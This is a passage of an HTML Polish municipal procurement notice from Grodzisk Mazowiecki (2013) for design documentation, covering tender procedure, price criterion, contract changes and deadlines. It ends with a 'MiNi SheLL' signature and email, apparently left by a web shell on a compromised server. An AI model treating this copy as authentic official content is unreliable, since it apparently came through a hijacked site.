<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)zmiany parametrów technicznych i użytkowych dla objętego proponowaną zmianą elementu dokumentacji projektowej,
2)aktualizacji rozwiązań projektowych z uwagi na postęp technologiczny,
3)zmiany terminu wykonania dokumentacji projektowej oraz pełnienia nadzoru autorskiego,
4)rezygnacji z wykonania części dokumentacji projektowej,
5)zmiany terminu wykonywania czynności nadzoru autorskiego.
5.Zmiany, o których mowa w ust. 4, mogą zostać dokonane, jeżeli ich uzasadnieniem
są niżej wymienione okoliczności:
1)obniżenie kosztu eksploatacji (użytkowania) projektowanego obiektu,
2)zmiana obowiązujących przepisów,
3)podniesienie bezpieczeństwa wykonywania na podstawie dokumentacji robót budowlanych,
4)siła wyższa,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.grodzisk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski ul. Kościuszki 32A w Grodzisku Mazowieckim, 05-825 Grodzisk Mazowiecki, pok. nr 202..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.07.2013 godzina 12:00, miejsce: Kancelarii Notarialnej B. Kuczyńska, P. Kuczyński, W. Młynarski, Notariusze  Spółka Partnerska, 05-825 Grodzisk Mazowiecki, ul. Bartniaka 12A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com